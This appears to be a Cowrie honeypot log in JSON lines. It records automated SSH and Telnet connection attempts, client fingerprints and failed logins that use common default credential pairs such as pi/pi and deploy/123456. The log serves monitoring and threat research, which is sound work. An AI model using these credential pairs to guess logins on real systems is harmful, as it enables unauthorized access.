{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54416,"dst_ip":"1.2.3.4","dst_port":22,"session":"896b27e57c3f","protocol":"ssh","message":"New connection: 212.227.235.229:54416 (1.2.3.4:22) [session: 896b27e57c3f]","sensor":"my-vps","timestamp":"2025-08-28T06:05:50.409982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:50.411457Z","src_ip":"212.227.235.229","session":"896b27e57c3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:50.553650Z","src_ip":"212.227.235.229","session":"896b27e57c3f"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:50.982630Z","src_ip":"212.227.235.229","session":"896b27e57c3f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:52.126817Z","src_ip":"212.227.235.229","session":"896b27e57c3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43812,"dst_ip":"1.2.3.4","dst_port":22,"session":"246bdbf56cc7","protocol":"ssh","message":"New connection: 212.227.125.160:43812 (1.2.3.4:22) [session: 246bdbf56cc7]","sensor":"my-vps","timestamp":"2025-08-28T06:05:58.016638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:05:58.025988Z","src_ip":"212.227.125.160","session":"246bdbf56cc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:05:58.123984Z","src_ip":"212.227.125.160","session":"246bdbf56cc7"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:05:58.541750Z","src_ip":"212.227.125.160","session":"246bdbf56cc7"}
{"eventid":"cowrie.session.closed","duration":31.03063201904297,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:58.998619Z","src_ip":"212.227.235.229","session":"fa14bb2fabef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:05:59.648241Z","src_ip":"212.227.125.160","session":"246bdbf56cc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57684,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78a18766521","protocol":"ssh","message":"New connection: 212.227.235.229:57684 (1.2.3.4:22) [session: d78a18766521]","sensor":"my-vps","timestamp":"2025-08-28T06:06:05.084201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:05.084918Z","src_ip":"212.227.235.229","session":"d78a18766521"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:05.231478Z","src_ip":"212.227.235.229","session":"d78a18766521"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:05.679871Z","src_ip":"212.227.235.229","session":"d78a18766521"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:06.827169Z","src_ip":"212.227.235.229","session":"d78a18766521"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39254,"dst_ip":"1.2.3.4","dst_port":22,"session":"19e97def5721","protocol":"ssh","message":"New connection: 212.227.125.160:39254 (1.2.3.4:22) [session: 19e97def5721]","sensor":"my-vps","timestamp":"2025-08-28T06:06:19.822646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:19.831242Z","src_ip":"212.227.125.160","session":"19e97def5721"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:19.935486Z","src_ip":"212.227.125.160","session":"19e97def5721"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40010,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2baae3d2fbb","protocol":"ssh","message":"New connection: 212.227.235.229:40010 (1.2.3.4:22) [session: b2baae3d2fbb]","sensor":"my-vps","timestamp":"2025-08-28T06:06:20.121687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:20.122462Z","src_ip":"212.227.235.229","session":"b2baae3d2fbb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:20.268730Z","src_ip":"212.227.235.229","session":"b2baae3d2fbb"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:20.347845Z","src_ip":"212.227.125.160","session":"19e97def5721"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:20.706701Z","src_ip":"212.227.235.229","session":"b2baae3d2fbb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:21.454462Z","src_ip":"212.227.125.160","session":"19e97def5721"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:21.854128Z","src_ip":"212.227.235.229","session":"b2baae3d2fbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36752,"dst_ip":"1.2.3.4","dst_port":22,"session":"807a3190224e","protocol":"ssh","message":"New connection: 212.227.235.229:36752 (1.2.3.4:22) [session: 807a3190224e]","sensor":"my-vps","timestamp":"2025-08-28T06:06:37.968949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:37.970283Z","src_ip":"212.227.235.229","session":"807a3190224e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:38.113457Z","src_ip":"212.227.235.229","session":"807a3190224e"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:38.688311Z","src_ip":"212.227.235.229","session":"807a3190224e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:39.834483Z","src_ip":"212.227.235.229","session":"807a3190224e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54847,"dst_ip":"1.2.3.4","dst_port":23,"session":"24640f228421","protocol":"telnet","message":"New connection: 212.227.235.229:54847 (1.2.3.4:23) [session: 24640f228421]","sensor":"my-vps","timestamp":"2025-08-28T06:06:40.659837Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55184,"dst_ip":"1.2.3.4","dst_port":23,"session":"34689ea590de","protocol":"telnet","message":"New connection: 212.227.235.229:55184 (1.2.3.4:23) [session: 34689ea590de]","sensor":"my-vps","timestamp":"2025-08-28T06:06:43.168675Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55312,"dst_ip":"1.2.3.4","dst_port":22,"session":"84bf3e435b6c","protocol":"ssh","message":"New connection: 212.227.125.160:55312 (1.2.3.4:22) [session: 84bf3e435b6c]","sensor":"my-vps","timestamp":"2025-08-28T06:06:45.486266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:45.575036Z","src_ip":"212.227.125.160","session":"84bf3e435b6c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:45.739054Z","src_ip":"212.227.125.160","session":"84bf3e435b6c"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:46.181522Z","src_ip":"212.227.125.160","session":"84bf3e435b6c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:47.289088Z","src_ip":"212.227.125.160","session":"84bf3e435b6c"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":37264,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f07a774024f","protocol":"telnet","message":"New connection: 8.222.212.69:37264 (1.2.3.4:23) [session: 1f07a774024f]","sensor":"my-vps","timestamp":"2025-08-28T06:06:48.651990Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35206,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff6d0c85379","protocol":"ssh","message":"New connection: 212.227.235.229:35206 (1.2.3.4:22) [session: aff6d0c85379]","sensor":"my-vps","timestamp":"2025-08-28T06:06:50.357327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:50.358387Z","src_ip":"212.227.235.229","session":"aff6d0c85379"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:50.503084Z","src_ip":"212.227.235.229","session":"aff6d0c85379"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:50.938859Z","src_ip":"212.227.235.229","session":"aff6d0c85379"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:52.085285Z","src_ip":"212.227.235.229","session":"aff6d0c85379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60832,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b82b29636b3","protocol":"ssh","message":"New connection: 212.227.125.160:60832 (1.2.3.4:22) [session: 3b82b29636b3]","sensor":"my-vps","timestamp":"2025-08-28T06:06:57.778037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:06:57.801893Z","src_ip":"212.227.125.160","session":"3b82b29636b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:06:57.882514Z","src_ip":"212.227.125.160","session":"3b82b29636b3"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T06:06:58.296025Z","src_ip":"212.227.125.160","session":"3b82b29636b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:06:59.402562Z","src_ip":"212.227.125.160","session":"3b82b29636b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57984,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ca620097cb4","protocol":"telnet","message":"New connection: 212.227.235.229:57984 (1.2.3.4:23) [session: 0ca620097cb4]","sensor":"my-vps","timestamp":"2025-08-28T06:07:03.436676Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40376,"dst_ip":"1.2.3.4","dst_port":22,"session":"34648ff6a29f","protocol":"ssh","message":"New connection: 212.227.235.229:40376 (1.2.3.4:22) [session: 34648ff6a29f]","sensor":"my-vps","timestamp":"2025-08-28T06:07:04.784886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:07:04.785872Z","src_ip":"212.227.235.229","session":"34648ff6a29f"}
